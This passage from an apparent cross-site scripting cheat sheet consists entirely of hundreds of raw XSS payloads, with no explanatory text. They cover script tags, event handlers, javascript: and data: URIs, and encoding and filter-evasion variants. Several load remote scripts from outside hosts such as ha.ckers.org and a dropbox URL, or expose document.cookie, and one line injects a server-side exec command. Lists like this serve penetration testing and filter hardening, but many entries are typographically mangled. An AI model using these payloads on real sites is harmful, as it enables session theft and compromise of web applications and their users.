SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt; &lt;IMG ”””&gt;&lt;SCRIPT&gt;alert(”XSS”)&lt;/SCRIPT&gt;”&gt; &lt;IMG SRC=`javascript&#058;alert(”RSnake says, ‘XSS’”)`&gt; &lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt; &lt;IMG SRC=JaVaScRiPt&#058;alert(‘XSS’)&gt; &lt;IMG SRC=javascript&#058;alert(‘XSS’)&gt; &lt;IMG SRC=”javascript&#058;alert(‘XSS’);”&gt; &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt; ‘’;! — ”&lt;XSS&gt;=&{()} ‘;alert(String&#46;fromCharCode(88,83,83))//’;alert(String&#46;fromCharCode(88,83,83))//”;alert(String&#46;fromCharCode(88,83,83))//”;alert(String&#46;fromCharCode(88,83,83))// — &gt;&lt;/SCRIPT&gt;”&gt;’&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt; ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ‘’;! — “<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC=”javascript:alert(‘XSS’);”> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=javascrscriptipt:alert(‘XSS’)> <IMG SRC=JaVaScRiPt:alert(‘XSS’)> <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”> <IMG SRC=” &#14; javascript:alert(‘XSS’);”> <SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT/SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert(“XSS”);//<</SCRIPT> <SCRIPT>a=/XSS/alert(a.source)</SCRIPT> ”;alert(‘XSS’);// </TITLE><SCRIPT>alert(“XSS”);</SCRIPT> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”> <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET> <TABLE BACKGROUND=”javascript:alert(‘XSS’)”> <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”> <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> <DIV STYLE=”background-image:00750072006C0028'006a006100760061007300630072006900700074003a0061006c0065007200740028.10270058.1053005300270029'0029"> <DIV STYLE=”width: expression(alert(‘XSS’));”> <STYLE>@import’javascript:alert(“XSS”)’;</STYLE> <IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”> <XSS STYLE=”xss:expression(alert(‘XSS’))”> exp/*<A STYLE=’noxss:noxss(“*//*”);xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(“XSS”))’> <EMBED SRC=”http://ha.ckers.org/xss.swf" AllowScriptAccess=”always”></EMBED> a=”get”;b=”URL(ja””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);”)”;eval(a+b+c+d+e); <SCRIPT SRC=”http://ha.ckers.org/xss.jpg"></SCRIPT> <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;”></BODY></HTML> <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <form id=”test” /><button form=”test” formaction=”javascript:alert(123)”>TESTHTML5FORMACTION <form><button formaction=”javascript:alert(123)”>crosssitespt <frameset onload=alert(123)> <! — <img src=” →<img src=x onerror=alert(123)//”> <style><img src=”</style><img src=x onerror=alert(123)//”> <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”> <embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”> <embed src=”javascript:alert(1)”> <? foo=”><script>alert(1)</script>”> <! foo=”><script>alert(1)</script>”> </ foo=”><script>alert(1)</script>”> <script>({0:#0=alert/#0#/#0#(123)})</script> <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()</script> <script src=”#”>{alert(1)}</script>;1 <script>crypto.generateCRMFRequest(‘CN=0’,0,0,null,’alert(1)’,384,null,’rsa-dual-use’)</script> <svg xmlns=”#”><script>alert(1)</script></svg> <svg onload=”javascript:alert(123)” xmlns=”#”></svg> <iframe xmlns=”#” src=”javascript:alert(1)”></iframe> +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “><s”%2b”cript>alert(document.cookie)</script> “><ScRiPt>alert(document.cookie)</script> “><<script>alert(document.cookie);//<</script> foo<script>alert(document.cookie)</script> <scr<script>ipt>alert(document.cookie)</scr</script>ipt> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo’; alert(document.cookie);//’; </script><script >alert(document.cookie)</script> <img src=asdf onerror=alert(document.cookie)> <BODY ONLOAD=alert(’XSS’)> <script>alert(1)</script> “><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> <video src=1 onerror=alert(1)> <audio src=1 onerror=alert(1)> <script>alert(123);</script> <ScRipT>alert(“XSS”);</ScRipT> <script>alert(123)</script> <script>alert(“hellox worldss”);</script> <script>alert(“XSS”)</script> <script>alert(“XSS”);</script> <script>alert(‘XSS’)</script> “><script>alert(“XSS”)</script> <script>alert(/XSS”)</script> <script>alert(/XSS/)</script> </script><script>alert(1)</script> ‘; alert(1); ‘)alert(1);// <ScRiPt>alert(1)</sCriPt> <IMG SRC=jAVasCrIPt:alert(‘XSS’)> <IMG SRC=”javascript:alert(‘XSS’);”> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=javascript:alert(‘XSS’)> <img src=xss onerror=alert(1)> <iframe %00 src=”&Tab;javascript:prompt(1)&Tab;”%00> <svg><style>{font-family&colon;’<iframe/onload=confirm(1)>’ <input/onmouseover=”javaSCRIPT&colon;confirm&lpar;1&rpar;” <sVg><scRipt %00>alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction=”javascript&colon;confirm(1)” <img src=`%00`&NewLine; onerror=alert(1)&NewLine; <script/&Tab; src=’https://dl.dropbox.com/u/13018058/js.js’ /&Tab;></script> <ScRipT 5–0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src=”data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ &#34;&#62;<h1/onmouseover=’u0061lert(1)’>%00 <iframe/src=”data:text/html,<svg &#111;&#110;load=alert(1)>”> <meta content=”&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)” http-equiv=”refresh”/> <svg><script xlink:href=data&colon;,window.open(‘https://www.google.com/’)></script <svg><script x:href=’https://dl.dropbox.com/u/13018058/js.js’ {Opera} <meta http-equiv=”refresh” content=”0;url=javascript:confirm(1)”> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href=”javascript:u0061lert&#x28;1&#x29;”>X </script><img/*%00/src=”worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> <form><iframe &#09;&#10;&#11; src=”javascript&#58;alert(1)”&#11;&#10;&#09;;> <a href=”data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”&#09;&#10;&#11;>X</a http://www.google<script .com>alert(document.location)</script <a&#32;href&#61;&#91;&#00;&#93;”&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a <img/src=@&#32;&#13; onerror = prompt(‘&#49;’) <style/onload=prompt&#40;’&#88;&#83;&#83;’&#41; <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; 🙁 &#00;</form><input type&#61;”date” onfocus=”alert(1)”> <form><textarea &#13; onkeyup=’u0061u006Cu0065u0072u0074&#x28;1&#x29;’> <script /***/>/***/confirm(‘uFF41uFF4CuFF45uFF52uFF54u1455uFF11u1450’)/***/</script /***/ <iframe srcdoc=’&lt;body onload=prompt&lpar;1&rpar;&gt;’> <a href=”javascript:void(0)” onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=&lt;! — &#09;&gt;&#10;alert&#10;&lpar;1&rpar;> <///style///><span %2F onmousemove=’alert&lpar;1&rpar;’>SPAN <img/src=’http://i.imgur.com/P8mL8.jpg’ onmouseover=&Tab;prompt(1) &#34;&#62;<svg><style>{-o-link-source&colon;’<body/onload=confirm(1)>’ &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} <marquee onstart=’javascript:alert&#x28;1&#x29;’>^__^ <div/style=”width:expression(confirm(1))”>X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type=’submit’>// /*iframe/src*/<iframe/src=”<iframe/src=@”/onload=prompt(1) /*iframe/src*/> //| <script //| src=’https://dl.dropbox.com/u/13018058/js.js’> //| </script //| </font>/<svg><style>{src&#x3A;’<style/onload=this.onload=confirm(1)>’</font>/</style> <a/href=”javascript:&#13; javascript:prompt(1)”><input type=”X”> </plaintext></|><plaintext/onmouseover=prompt(1) </svg>’’<svg><script ‘AQuickBrownFoxJumpsOverTheLazyDog’>alert&#x28;1&#x29; {Opera} <a href=”javascript&colon;u0061&#x6C;&#101%72t&lpar;1&rpar;”><button> <div onmouseover=’alert&lpar;1&rpar;’>DIV</div> <iframe style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”> <a href=”jAvAsCrIpT&colon;alert&lpar;1&rpar;”>X</a> <embed src=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf”> <object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf”> <var onmouseover=”prompt(1)”>On Mouse Over</var> <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src=”/” =_=” title=”onerror=’prompt(1)’”> <%<! — ‘%><script>alert(1);</script → <script src=”data:text/javascript,alert(1)"></script> <iframe/src //onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type=”text” value=`` <div/onmouseover=’alert(1)’>X</div> http://www.<script>alert(1)</script .com <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> <svg><script ?>alert(1) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <meta http-equiv=”refresh” content=”0;javascript&colon;alert(1)”/> <math><a xlink:href=”//jsfiddle.net/t846h/”>click <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf” allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href=”data:text/html;base64_,<svg/onload=u0061&#x6C;&#101%72t(1)>”>X</a <iframe/onreadystatechange=u0061u006Cu0065u0072u0074(‘u0061') worksinIE> <script>~’u0061' ; u0074u0068u0072u006Fu0077 ~ u0074u0068u0069u0073. u0061u006Cu0065u0072u0074(~’u0061')</script U+ <script/src=”data&colon;text%2Fju0061vu0061script,u0061lert(‘u0061’)”></script a=u0061 & /=%2F <script/src=data&colon;text/ju0061vu0061&#115&#99&#114&#105&#112&#116,u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon;u0061&#x6C;&#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=&lt;! — &gt;&#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?/onerror = alert(1) <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover=’alert(1)’> style=”x:”> ←`<img/src=` onerror=alert(1)> — !> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> <div style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button> “><img src=x onerror=window.open(‘https://www.google.com/’);> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href=”//jsfiddle.net/t846h/”>click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe> <a href=”data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”> <<SCRIPT>alert(“XSS”);//<</SCRIPT> %253cscript%253ealert(1)%253c/script%253e “><s”%2b”cript>alert(document.cookie)</script> foo<script>alert(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <BODY BACKGROUND=”javascript:alert(‘XSS’)”> <BODY ONLOAD=alert(‘XSS’)> <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”> <IMG SRC=”javascript:alert(‘XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < javascript:alert(“hellox worldss”) <img src=”javascript:alert(‘XSS’);”> <img src=javascript:alert(&quot;XSS&quot;)> <”’;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”> <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> <EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED> <SCRIPT a=”>” SRC=”http://ha.ckers.org/xss.js”></SCRIPT> <SCRIPT a=”>” ‘’ SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT “a=’>’” SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=”>’>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert(“XSS”);//<</SCRIPT> <”’;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search <script>alert(“hellox worldss”)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 <script>alert(“XSS”);</script>&search=1 0&q=’;alert(String.fromCharCode(88,83,83))//’;alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//”;alert(String.fromCharCode(88,83,83)%?29// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search <h1><font color=blue>hellox worldss</h1> <BODY ONLOAD=alert(‘hellox worldss’)> <input onfocus=write(XSS) autofocus> <input onblur=write(XSS) autofocus><input autofocus> <body onscroll=alert(XSS)><br><br><br><br><br><br>…<br><br><br><br><input autofocus> <form><button formaction=”javascript:alert(XSS)”>lol <! — <img src=” →<img src=x onerror=alert(XSS)//”> <![><img src=”]><img src=x onerror=alert(XSS)//”> <style><img src=”</style><img src=x onerror=alert(XSS)//”> <? foo=”><script>alert(1)</script>”> <! foo=”><script>alert(1)</script>”> </ foo=”><script>alert(1)</script>”> <? foo=”><x foo=’?><script>alert(1)</script>’>”> <! foo=”[[[Inception]]”><x foo=”]foo><script>alert(1)</script>”> <% foo><x foo=”%><script>alert(123)</script>”> <div style=”font-family:’foo&#10;;color:red;’;”>LOL LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> <script>({0:#0=alert/#0#/#0#(0)})</script> <svg xmlns=”http://www.w3.org/2000/svg”>LOL<script>alert(123)</script></svg> &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt; ”;alert(‘XSS’);// &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(”XSS”);&lt;/SCRIPT&gt; &lt;INPUT TYPE=”IMAGE” SRC=”javascript&#058;alert(‘XSS’);”&gt; &lt;BODY BACKGROUND=”javascript&#058;alert(‘XSS’)”&gt; &lt;BODY ONLOAD=alert(‘XSS’)&gt; &lt;IMG DYNSRC=”javascript&#058;alert(‘XSS’)”&gt; &lt;IMG LOWSRC=”javascript&#058;alert(‘XSS’)”&gt; &lt;BGSOUND SRC=”javascript&#058;alert(‘XSS’);”&gt; &lt;BR SIZE=”&{alert(‘XSS’)}”&gt; &lt;LAYER SRC=”http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html"&gt;&lt;/LAYER&gt; &lt;LINK REL=”stylesheet” HREF=”javascript&#058;alert(‘XSS’);”&gt; &lt;LINK REL=”stylesheet” HREF=”http&#58;//ha&#46;ckers&#46;org/xss&#46;css”&gt; &lt;STYLE&gt;@import’http&#58;//ha&#46;ckers&#46;org/xss&#46;css’;&lt;/STYLE&gt; &lt;META HTTP-EQUIV=”Link” Content=”&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet”&gt; &lt;STYLE&gt;BODY{-moz-binding&#58;url(”http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss”)}&lt;/STYLE&gt; &lt;XSS STYLE=”behavior&#58; url(xss&#46;htc);”&gt; &lt;STYLE&gt;li {list-style-image&#58; url(”javascript&#058;alert(‘XSS’)”);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS &lt;IMG SRC=’vbscript&#058;msgbox(”XSS”)’&gt; &lt;IMG SRC=”mocha&#58;&#91;code&#93;”&gt; &lt;IMG SRC=”livescript&#058;&#91;code&#93;”&gt; žscriptualert(EXSSE)ž/scriptu &lt;META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript&#058;alert(‘XSS’);”&gt; &lt;META HTTP-EQUIV=”refresh” CONTENT=”0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”&gt; &lt;META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http&#58;//;URL=javascript&#058;alert(‘XSS’);” &lt;IFRAME SRC=”javascript&#058;alert(‘XSS’);”&gt;&lt;/IFRAME&gt; &lt;FRAMESET&gt;&lt;FRAME SRC=”javascript&#058;alert(‘XSS’);”&gt;&lt;/FRAMESET&gt; &lt;TABLE BACKGROUND=”javascript&#058;alert(‘XSS’)”&gt; &lt;TABLE&gt;&lt;TD BACKGROUND=”javascript&#058;alert(‘XSS’)”&gt; &lt;DIV STYLE=”background-image&#58; url(javascript&#058;alert(‘XSS’))”&gt; &lt;DIV STYLE=”background-image&#58;00750072006C0028'006a006100760061007300630072006900700074003a0061006c0065007200740028&#46;10270058&#46;1053005300270029'0029”&gt; &lt;DIV STYLE=”background-image&#58; url(javascript&#058;alert(‘XSS’))”&gt; &lt;DIV STYLE=”width&#58; expression(alert(‘XSS’));”&gt; &lt;STYLE&gt;@import’javascript&#58;alert(”XSS”)’;&lt;/STYLE&gt; &lt;IMG STYLE=”xss&#58;expr/*XSS*/ession(alert(‘XSS’))”&gt; &lt;XSS STYLE=”xss&#58;expression(alert(‘XSS’))”&gt; exp/*&lt;A STYLE=’noxss&#58;noxss(”*//*”); xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(”XSS”))’&gt; &lt;STYLE TYPE=”text/javascript”&gt;alert(‘XSS’);&lt;/STYLE&gt; &lt;STYLE&gt;&#46;XSS{background-image&#58;url(”javascript&#058;alert(‘XSS’)”);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; &lt;STYLE type=”text/css”&gt;BODY{background&#58;url(”javascript&#058;alert(‘XSS’)”)}&lt;/STYLE&gt; &lt;! — &#91;if gte IE 4&#93;&gt; &lt;SCRIPT&gt;alert(‘XSS’);&lt;/SCRIPT&gt; &lt;!&#91;endif&#93; — &gt; &lt;BASE HREF=”javascript&#058;alert(‘XSS’);//”&gt; &lt;OBJECT TYPE=”text/x-scriptlet” DATA=”http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html”&gt;&lt;/OBJECT&gt; &lt;OBJECT classid=clsid&#58;ae24fdae-03c6–11d1–8b76–0080c744f389&gt;&lt;param name=url value=javascript&#058;alert(‘XSS’)&gt;&lt;/OBJECT&gt; &lt;EMBED SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;swf” AllowScriptAccess=”always”&gt;&lt;/EMBED&gt; &lt;EMBED SRC=”data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”&gt;&lt;/EMBED&gt; a=”get”; b=”URL(””; c=”javascript&#058;”; d=”alert(‘XSS’);”)”; eval(a+b+c+d); &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=”xss” implementation=”http&#58;//ha&#46;ckers&#46;org/xss&#46;htc”&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt; &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=”javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert(‘XSS’);”&gt;&#93;&#93;&gt; &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; &lt;XML ID=”xss”&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=”javas&lt;! — — &gt;cript&#58;alert(‘XSS’)”&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; &lt;SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”&gt;&lt;/SPAN&gt; &lt;XML SRC=”xsstest&#46;xml” ID=I&gt;&lt;/XML&gt; &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; &lt;HTML&gt;&lt;BODY&gt; &lt;?xml&#58;namespace prefix=”t” ns=”urn&#58;schemas-microsoft-com&#58;time”&gt; &lt;?import namespace=”t” implementation=”#default#time2”&gt; &lt;t&#58;set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;”&gt; &lt;/BODY&gt;&lt;/HTML&gt; &lt;SCRIPT SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg”&gt;&lt;/SCRIPT&gt; &lt;! — #exec cmd=”/bin/echo ‘&lt;SCR’” — &gt;&lt;! — #exec cmd=”/bin/echo ‘IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;’” — &gt; &lt;? echo(‘&lt;SCR)’; echo(‘IPT&gt;alert(”XSS”)&lt;/SCRIPT&gt;’); ?&gt; &lt;IMG SRC=”http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode”&gt; Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser &lt;META 